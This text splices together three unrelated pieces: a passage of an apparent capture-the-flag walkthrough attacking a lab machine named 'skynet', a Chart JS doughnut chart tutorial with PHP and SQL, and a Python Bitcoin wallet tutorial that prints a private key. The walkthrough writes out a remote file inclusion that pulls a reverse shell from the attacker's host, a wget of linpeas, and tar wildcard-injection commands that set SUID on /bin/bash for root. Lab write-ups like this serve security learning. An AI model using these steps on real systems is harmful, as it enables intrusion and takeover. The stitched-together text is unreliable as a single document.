      Convolutional Neural Networks-CNN.pdf                       N  19655446  Tue Sep 17 05:05:14 2019
      notes                                                       D         0  Tue Sep 17 05:18:40 2019
      Neural Networks and Deep Learning.pdf                       N   4304586  Tue Sep 17 05:05:14 2019
      Structuring your Machine Learning Project.pdf               N   3531427  Tue Sep 17 05:05:14 2019

      9204224 blocks of size 1024. 5831424 blocks available
    

    Let’s grab the important.txt file:

    get important.txt

    Reading through the contents, we are pointed toward a hidden beta CMS directory:

    /45kra24zxs28v3yd

    GOBUSTER FOR DIRECTORY SNIFFING

    We’ll further enumerate the hidden beta cms directory now with gobuster.

    gobuster dir -u http://10.10.221.72/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirb/common.txt
    
    ===============================================================
    Gobuster v3.1.0
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
    ===============================================================
    [+] Url: http://10.10.169.173/45kra24zxs28v3yd/
    [+] Method: GET
    [+] Threads: 10
    [+] Wordlist: /usr/share/wordlists/dirb/common.txt
    [+] Negative Status codes: 404
    [+] User Agent: gobuster/3.1.0
    [+] Timeout: 10s
    ===============================================================
    2023/01/24 09:52:22 Starting gobuster in directory enumeration mode
    ===============================================================
    /.hta (Status: 403) [Size: 278]
    /.htaccess (Status: 403) [Size: 278]
    /.htpasswd (Status: 403) [Size: 278]
    /administrator (Status: 301) [Size: 339] [--> http://10.10.169.173/45kra24zxs28v3yd/administrator/]
    /index.html (Status: 200) [Size: 418]
    ===============================================================
    2023/01/24 09:53:04 Finished
    ===============================================================
    

    ADMINISTRATOR PORTAL DISCOVERED!

    http://10.10.169.173/45kra24zxs28v3yd/administrator/

    IDENTIFY A KNOWN VULNERABILITY

    Looking up the service name shows us that there is a remote file inclusion vulnerability.

    SPAWN A REVERSE SHELL WITH PHP PENTEST MONKEY AND REMOTE FILE INCLUSION

    After preparing a basic php revshell, serving it with a simple HTTP server, we now go to our browser and load the address:

    http://10.10.221.72/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://$myIP:8000/payload.php

    STABILIZE THE SHELL

    python -c 'import pty;pty.spawn("/bin/bash")';

    ENUMERATE WITH LINPEAS

    After downloading linpeas.sh and serving it with the simple HTTP server, we can copy it over to our target machine’s /tmp folder with wget http://$myIP:port/linpeas.sh.

    $ ./linpeas.sh
    /---------------------------------------------------------------------------------\
    | Do you like PEASS?                                                              |
    |---------------------------------------------------------------------------------|
    | Get the latest version : https://github.com/sponsors/carlospolop                |
    | Follow on Twitter      : @carlospolopm                                          |
    | Respect on HTB         : SirBroccoli                                            |
    |---------------------------------------------------------------------------------|
    | Thank you!                                                                      |
    \---------------------------------------------------------------------------------/
    linpeas-ng by carlospolop
    

    🔐 ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it on your own computers and/or with the computer owner’s permission.

    Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist

    LEGEND:
      RED/YELLOW: 95% a PE vector
      RED: You should take a look to it
      LightCyan: Users with console
      Blue: Users without console & mounted devs
      Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
      LightMagenta: Your username

    Starting linpeas. Caching Writable Folders...

                                   ╔═══════════════════╗
    ═══════════════════════════════╣ Basic information ╠═══════════════════════════════
                                   ╚═══════════════════╝
    OS: Linux version 4.8.0-58-generic (buildd@lgw01-21) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017
    User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
    Hostname: skynet
    Writable folder: /dev/shm
    [+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
    [+] /bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h)
    [+] /bin/nc is available for network discovery & port scanning (linpeas can discover hosts and scan ports, learn more with -h)

    Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE

                                  ╔════════════════════╗
    ══════════════════════════════╣ System Information ╠══════════════════════════════
                                  ╚════════════════════╝
    ╔══════════╣ Operative system
    ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
    Linux version 4.8.0-58-generic (buildd@lgw01-21) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017
    Distributor ID: Ubuntu
    Description: Ubuntu 16.04.6 LTS
    Release: 16.04
    Codename: xenial

    ╔══════════╣ Sudo version
    ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
    Sudo version 1.8.16

    ╔══════════╣ CVEs Check
    Vulnerable to CVE-2021-4034
    Potentially Vulnerable to CVE-2022-2588

    ---abbreviated ---
    THE MOST RELEVANT INFO FROM LINPEAS:

    VULNERABLE TO CVE-2021-4034
    MAYBE CVE-2022-2588
    https://github.com/carlospolop/PEASS-ng/releases/download/20230122/linpeas.sh

    [+] [CVE-2017-16995] eBPF_verifier
       Details: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
       Exposure: highly probable
       Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic}
       Download URL: https://www.exploit-db.com/download/45010
       Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
    

    FURTHER ENUMERATION

    Let’s probe a bit more into this machine for some of the common Linux privilege escalation pathways.

    CHECK CRONJOBS

    cat /etc/crontab

    Output:

    # m h dom mon dow user command
    */1 * * * * root /home/milesdyson/backups/backup.sh
    17 * * * * root	cd / && run-parts --report /etc/cron.hourly
    25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
    47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
    52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
    #
    

    The first job in the list is set to run every minute and it just executes backup.sh. Let’s find out what that file does.
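
To make the schedule fields explicit, here is a minimal Python sketch that splits the first job line from the crontab output into its parts. The helper name `parse_system_cron_line` is hypothetical, and the sketch only handles the `/etc/crontab` layout shown above (five time fields, a user, then the command).

```python
# Split one /etc/crontab-style line into its named fields.
# Assumption: the line uses the system crontab layout, which has a user column.
CRON_LINE = "*/1 * * * * root /home/milesdyson/backups/backup.sh"


def parse_system_cron_line(line):
    """Return the seven fields of a system crontab line as a dict."""
    minute, hour, dom, month, dow, user, command = line.split(None, 6)
    return {
        "minute": minute,
        "hour": hour,
        "dom": dom,
        "month": month,
        "dow": dow,
        "user": user,
        "command": command,
    }


job = parse_system_cron_line(CRON_LINE)

# "*/1" in the minute field means "every 1 minute"; the other time fields are wildcards.
runs_every_minute = job["minute"] in ("*", "*/1") and all(
    job[field] == "*" for field in ("hour", "dom", "month", "dow")
)

print(job["user"], job["command"], runs_every_minute)
```

The point to notice is the user column: the job runs as root, so anything backup.sh can be tricked into executing also runs as root.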

    We can see that backup.sh starts a new shell, changes directory to /var/www/html, and then creates a tarball of all the files in /var/www/html and stores it in /home/milesdyson/backups/backup.tgz.

    The * is a shell wildcard that expands to every file name in the current directory. We can exploit this by adding our own files whose names look like tar command-line options, so that the cronjob that runs backup.sh every minute launches our malicious file, magic.sh, while it creates the tarball of the directory’s contents.
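
The following Python sketch illustrates why the wildcard matters. It only lists file names in a temporary directory and does not run tar. It assumes, as described above, that the script hands a bare * to tar, and the helper name `expanded_arguments` is hypothetical.

```python
import os
import tempfile


def expanded_arguments(directory):
    """Approximate what a shell `*` expands to inside `directory`.

    Names starting with '.' are skipped, as the shell does by default.
    """
    return sorted(name for name in os.listdir(directory) if not name.startswith("."))


with tempfile.TemporaryDirectory() as workdir:
    # One ordinary file and one file whose *name* looks like a command-line option.
    for name in ("index.html", "--checkpoint=1"):
        open(os.path.join(workdir, name), "w").close()

    args = expanded_arguments(workdir)
    # The program receiving these arguments cannot tell that an entry beginning
    # with '-' came from a file name rather than from whoever wrote the script.
    option_like = [arg for arg in args if arg.startswith("-")]

print(args)
print(option_like)
```

The usual way to close this hole in a script is to write ./* instead of *, or to place -- before the wildcard, so that no expanded name can be parsed as an option.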

    PLAN AND CARRY OUT PRIVILEGE ESCALATION

    First, we’ll create the magic.sh file that will add a SUID bit to /bin/bash. After setting this up and waiting at least 1 minute for the cronjob to run, we can start bash in privileged mode (/bin/bash -p) to spawn a root shell.

    printf '#!/bin/bash\nchmod +s /bin/bash' > magic.sh

    Next, let’s use echo to create two more files with unusual names that are necessary for the tarball creation process to trigger our magic.sh program and add the SUID bit to /bin/bash.

    echo "/var/www/html" > "--checkpoint-action=exec=sh magic.sh"
    echo "/var/www/html" > --checkpoint=1

    USER FLAG

    Let’s grab the user flag from /home/milesdyson

    $ cat user.txt
    7c—-omitted—----07

    ROOT FLAG

    cat /root/root.txt
    3f—-omitted—----49

    TAKE-AWAYS

    Takeaway #1 – The simpler solution is usually the better solution. I wasted a lot of time trying to get Metasploit to catch the reverse shell and start a meterpreter session.

    In the end, I learned I had overlooked setting the payload on msfconsole listener (exploit(multi/handler)) to match that of my reverse shell payload.

    It’s not listed when you search “options”, but it is still necessary to set it to be able to properly catch the shell and start a meterpreter session. In the end, I used a basic shell session to root the box, and all of that precious time spent on Metasploit didn’t help me get root access.

    Takeaway #2 – Remote file inclusion vulnerabilities allow threat actors to carry out arbitrary code execution. In practice, this means that your machine can be quickly compromised, all the way down to the root user.


    Chart JS Doughnut

    by Vincy. Last modified on January 30th, 2023.

    The doughnut chart is similar to the pie chart except for the cutout area in the middle of the pie graph.

    It shows how a whole is divided into parts. The circle of the pie or doughnut chart is the whole, and its segments give the relative statistics.

    This quick example has the Chart JS JavaScript to display a doughnut chart. Earlier, we started with Chart JS line chart and have seen many examples for this library.

    Quick example

    <!DOCTYPE html>
    <html>
    <head>
    <title>Chart JS Doughnut</title>
    <link rel='stylesheet' href='style.css' type='text/css' />
    </head>
    <body>
        <div class="phppot-container">
            <h1>Chart JS Doughnut</h1>
            <div>
                <canvas id="chartjs-doughnut"></canvas>
            </div>
        </div>
        <script src="https://cdn.jsdelivr.net/npm/chart.js@4.0.1/dist/chart.umd.min.js"></script>
        <script>
            new Chart(document.getElementById("chartjs-doughnut"), {
                type: 'doughnut',
                data: {
                    labels: ["Lion", "Horse", "Elephant", "Tiger", "Jaguar"],
                    datasets: [{
                        backgroundColor: ["#51EAEA", "#FCDDB0", "#FF9D76", "#FB3569", "#82CD47"],
                        data: [418, 263, 434, 586, 332]
                    }]
                },
                options: {
                    plugins: {
                        // Chart.js 3 and later read the title from options.plugins.title
                        title: {
                            display: true,
                            text: 'Chart JS Doughnut.'
                        }
                    },
                    cutout: '60%', // the portion of the doughnut that is the cutout in the middle
                    radius: 200
                }
            });
        </script>
    </body>
    </html>
    

    In a previous article, we saw how to use the Chart JS JavaScript library to create a pie chart.

    The code for the doughnut chart differs only in the type property: type: 'doughnut' instead of type: 'pie'.

    Output

    It displays the count of each animal on a segment of the doughnut chart.

    As in the pie chart example, the animal names are taken for the “labels” property. The count of each animal is the chart data. Different background colors classify it in the doughnut chart.

    The below figure shows the output of this Chart JS doughnut example.

    Doughnut Chart with PHP and MySQL Database

    This example will be helpful if you want to display dynamic data from an external source.

    It uses a database source to supply data for the Chart JS doughnut chart.

    The db_chartjs_data database contains the tbl_marks table. It holds each student’s mark as a percentage.

    The doughnut chart should display the number of students who got a particular percentage.

    doughnut-chart-with-php-database.php

    <?php
    $conn = new mysqli('localhost', 'root', '', 'db_chartjs_data');
    $sql = "SELECT count(*) as marks_percentage_count, percentage FROM tbl_marks GROUP BY percentage";
    $result = $conn->query($sql);
    {
        $label = array();
        $percentage = array();
        while ($row = $result->fetch_assoc()) {
            $label[] = $row["percentage"] . "%";
            $percentage[] = $row["marks_percentage_count"];
        }
    }
    $chartLabel = json_encode($label);
    $chartData = json_encode($percentage);
    ?>
    <!DOCTYPE html>
    <html>
    <head>
    <title>Doughnut Chart with PHP and MySQL Database</title>
    <link rel='stylesheet' href='style.css' type='text/css' />
    </head>
    <body>
        <div class="phppot-container">
            <h1>Doughnut Chart with PHP and MySQL Database</h1>
            <div>
                <canvas id="chartjs-doughnut"></canvas>
            </div>
        </div>
        <script src="https://cdn.jsdelivr.net/npm/chart.js@4.0.1/dist/chart.umd.min.js"></script>
        <script>
            new Chart(document.getElementById("chartjs-doughnut"), {
                type: 'doughnut',
                data: {
                    // JSON-encoded labels and counts prepared by the PHP block above
                    labels: <?php echo $chartLabel; ?>,
                    datasets: [{
                        backgroundColor: ["#51EAEA", "#FCDDB0", "#FF9D76", "#FB3569", "#82CD47"],
                        data: <?php echo $chartData; ?>
                    }]
                },
                options: {
                    plugins: {
                        // Chart.js 3 and later read the title from options.plugins.title
                        title: {
                            display: true,
                            text: 'Chart JS Doughnut'
                        }
                    },
                    cutout: '60%', // the portion of the doughnut that is cutout in the middle
                    radius: 200
                }
            });
        </script>
    </body>
    </html>
    

    This is the database script to import before running this example.

    db_chartjs_data.sql

    --
    -- Database: `db_chartjs_data`
    --

    --
    -- Table structure for table `tbl_marks`
    --

    CREATE TABLE `tbl_marks` (
      `id` int(11) NOT NULL,
      `name` varchar(55) NOT NULL,
      `percentage` int(11) NOT NULL
    ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;

    --
    -- Dumping data for table `tbl_marks`
    --

    INSERT INTO `tbl_marks` (`id`, `name`, `percentage`) VALUES
    (1, 'John', 85),
    (2, 'Matthew', 85),
    (3, 'Tim', 65),
    (4, 'Clare', 75),
    (5, 'Viola', 85),
    (6, 'Vinolia', 75),
    (7, 'Laura', 85),
    (8, 'Leena', 75),
    (9, 'Evan', 85),
    (10, 'Ellen', 90);

    --
    -- Indexes for table `tbl_marks`
    --
    ALTER TABLE `tbl_marks`
      ADD PRIMARY KEY (`id`);

    --
    -- AUTO_INCREMENT for dumped tables
    --

    --
    -- AUTO_INCREMENT for table `tbl_marks`
    --
    ALTER TABLE `tbl_marks`
      MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=11;
    

    The PHP code above prepares a query to fetch the number of students grouped by percentage. There are four distinct percentages in the database.
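
To see what the grouped query returns without setting up MySQL, the same rows can be loaded into an in-memory SQLite database. This is only a sketch: SQLite stands in for MySQL, the ORDER BY clause is added here to make the row order predictable, and `json.dumps` plays the role of PHP’s `json_encode`.

```python
import json
import sqlite3

# The ten rows from db_chartjs_data.sql.
ROWS = [
    (1, "John", 85), (2, "Matthew", 85), (3, "Tim", 65), (4, "Clare", 75),
    (5, "Viola", 85), (6, "Vinolia", 75), (7, "Laura", 85), (8, "Leena", 75),
    (9, "Evan", 85), (10, "Ellen", 90),
]

conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE tbl_marks ("
    "id INTEGER PRIMARY KEY, name TEXT NOT NULL, percentage INTEGER NOT NULL)"
)
conn.executemany("INSERT INTO tbl_marks VALUES (?, ?, ?)", ROWS)

# Same query as the PHP example, plus ORDER BY (an addition for stable output).
query = (
    "SELECT count(*) AS marks_percentage_count, percentage "
    "FROM tbl_marks GROUP BY percentage ORDER BY percentage"
)
result = conn.execute(query).fetchall()
conn.close()

labels = [f"{percentage}%" for _count, percentage in result]
counts = [count for count, _percentage in result]

# These two strings are what the page would hand to Chart JS.
chart_label = json.dumps(labels)
chart_data = json.dumps(counts)
print(chart_label)
print(chart_data)
```

The four groups are 65%, 75%, 85% and 90%, with 1, 3, 5 and 1 students respectively, which is why the doughnut has four segments.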

    This output screenshot displays the number of students who scored a particular percentage.

    Output

    dynamic doughnut chart

    The ChartJS script for a doughnut chart accepts an additional, optional property: cutout, specified in the ChartJS options object.

    It accepts a percentage value and determines the size of the transparent area cut out of the middle of the doughnut chart.
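
As a rough illustration of what the percentage means, the sketch below computes the hole radius for the values used in the examples (radius: 200 and cutout: '60%'). It is a simplified model written for this article, not Chart JS code: it assumes a percentage cutout is taken relative to the outer radius, and the function name `inner_radius` is hypothetical.

```python
def inner_radius(outer_radius_px, cutout):
    """Return the radius of the hole for a percentage cutout such as '60%'.

    Simplified model: the hole radius is the given fraction of the outer
    radius, capped at 100%. Only percentage strings are handled here.
    """
    if not (isinstance(cutout, str) and cutout.endswith("%")):
        raise ValueError("this sketch only handles percentage strings like '60%'")
    fraction = min(float(cutout[:-1]) / 100.0, 1.0)
    return outer_radius_px * fraction


outer = 200
hole = inner_radius(outer, "60%")
ring_thickness = outer - hole
print(hole, ring_thickness)
```

Under this model, a 60% cutout on a 200-pixel radius leaves a hole of about 120 pixels and a coloured ring about 80 pixels thick. A cutout of '0%' would turn the doughnut back into a pie.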


    I Used These 3 Easy Steps to Create a Bitcoin Wallet in Python (Public/Private)


    As I write this, Bitcoin is in a deep bear market. That’s the perfect time to learn about the tech and start building!

    After listening to a podcast from Lyn Alden today, I wondered if it is possible to programmatically create a Bitcoin wallet, i.e., a public/private key pair.

    This can be extremely useful in practice, not only if you want to create an application that uses the “decentralized money layer” to transfer value between two parties in a fully automatic way, but also if you want to quickly create a public/private key pair to send and receive BTC without trusting a third party.

    You may not trust that wallet provider after all. It is in the nature of the Bitcoin protocol that if you desperately need it, you’ll need it quickly and without lots of trust assumptions. So better be prepared!

    In this project, we’ll answer the following interesting question.

    🪙 Project: How to create a Bitcoin wallet in Python (public/private key pair)?

    Step 1: Install Library

    Use pip to install the bitcoinaddress library in your system or virtual environment.

    🔐 Is It Safe? I investigated the library code from the GitHub repository associated with this library, and I couldn’t find any trust issues. Specifically, I searched for “hacks” in the code, such as sending the public/private key pair to a remote server, but the repository seems to be clean. It is also well-respected in the community, so unlikely to be tampered with. I didn’t check if the public/private key pairs have maximum entropy, i.e., are truly randomly created with all private keys having the same likelihood. I cannot guarantee that this is 100% safe because I don’t know the owner of the library — but it looks safe at first and second glance.

    To install the library, here are three of the most common ways:

    👉 Python 3
    pip3 install bitcoinaddress

    👉 Standard Python and Python 2 Installation
    pip install bitcoinaddress

    👉 Jupyter Notebook Cell
    !pip install bitcoinaddress

    Here’s what this looks like in my Jupyter Notebook:

    🌍 Recommended: 5 Steps to Install a Python Library

    Step 2: Import and Create Wallet

    The Wallet class from the bitcoinaddress module allows you to easily create a new, random public/private key pair using the Wallet() constructor. That is all you need to create a new random Bitcoin wallet.

    from bitcoinaddress import Wallet
    wallet = Wallet()

    Stay with me. You’re almost done! 💪

    Step 3: Print Wallet

    Next, print the content of the newly created wallet. This contains all the information you need about the public and private keys and addresses.

    print(wallet)

    In the following output, I bolded the two relevant lines with the public address and the private key:

    Private Key HEX: 6b789bec69f7f90c2ed73c8ee58f1f899b42fde5641359f6b76a27b4406399f7
    Private Key WIF: 5JdcnccAMqs1t38VTPyeGHgBQ7KaYGueSqUAmLBTzVqFzh4ssUN
    Private Key WIF compressed: KzpcxLACJzfktGQ4bWR1UUbvtzu133DNH2vv6ffC8nG1BFSUFBfr
    Public Key: 0415d47844bab349f12ae51a4b7f9d5eeab11ddf5d958e7fc67f6d29a456394be997d31989f6dcca716db63898c739621a86aa4a7bbe74c8936a6f1bbc7937c5c0
    Public Key compressed: 0215d47844bab349f12ae51a4b7f9d5eeab11ddf5d958e7fc67f6d29a456394be9
    Public Address 1: 14XyDoAgdGF7xiCrgux5Bd7P993PnXALuW
    Public Address 1 compressed: 1LW26DRtBraVQ5ec7J5D3uQsM3AD3oVHXx
    Public Address 3: 32iX1WnnMkLQLc6beTQ6no5H4J6arvUeBP
    Public Address bc1 P2WPKH: bc1q6hn4e55vfh6ka0z88tpr2jmqze8w4j84axsjh4
    Public Address bc1 P2WSH: bc1qhff5zxmy7rs5mvx037ztg95nnnqe97fet66l65xgsafv89tmz8xssm8tph

    The output of the bitcoinaddress.Wallet() method provides the details of a new bitcoin wallet.

    It includes the private key in both HEX and Wallet Import Format (WIF), as well as the compressed version of the WIF.
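
To show how the HEX and WIF forms relate, here is a minimal sketch of the commonly documented WIF encoding: prefix the 32-byte key with 0x80, optionally append 0x01 for the compressed form, add a 4-byte double-SHA256 checksum, and Base58-encode the result. It uses only the standard library and does not call bitcoinaddress. The function names `base58check_encode` and `hex_to_wif` are hypothetical, and the sketch assumes a mainnet key.

```python
import hashlib

BASE58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def base58check_encode(payload: bytes) -> str:
    """Append a 4-byte double-SHA256 checksum and Base58-encode the result."""
    checksum = hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]
    data = payload + checksum
    number = int.from_bytes(data, "big")
    encoded = ""
    while number > 0:
        number, remainder = divmod(number, 58)
        encoded = BASE58_ALPHABET[remainder] + encoded
    # Each leading zero byte is represented by the character '1'.
    leading_zeros = len(data) - len(data.lstrip(b"\x00"))
    return "1" * leading_zeros + encoded


def hex_to_wif(private_key_hex: str, compressed: bool = False) -> str:
    """Convert a 32-byte private key in hex to mainnet WIF (assumed prefix 0x80)."""
    key = bytes.fromhex(private_key_hex)
    if len(key) != 32:
        raise ValueError("a private key must be exactly 32 bytes")
    payload = b"\x80" + key + (b"\x01" if compressed else b"")
    return base58check_encode(payload)


# The HEX private key from the wallet output above.
PRIVATE_KEY_HEX = "6b789bec69f7f90c2ed73c8ee58f1f899b42fde5641359f6b76a27b4406399f7"

wif = hex_to_wif(PRIVATE_KEY_HEX)
wif_compressed = hex_to_wif(PRIVATE_KEY_HEX, compressed=True)
print(wif)
print(wif_compressed)
```

You can compare the two printed strings with the “Private Key WIF” and “Private Key WIF compressed” lines of the wallet output. An uncompressed mainnet WIF is 51 characters long and starts with 5, while the compressed form is 52 characters long and starts with K or L.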

    It also provides the public key, both in uncompressed and compressed formats, as well as three different public addresses generated from the public key.

    I actually checked the address on a Blockchain explorer, and it’s the correct one:

    I also checked whether the public address and the private key match, and they do seem to:

    Additionally, it provides 2 SegWit addresses generated from the public key; one in Pay-to-Witness-Public-Key-Hash (P2WPKH) format and one in Pay-to-Witness-Script-Hash (P2WSH) format.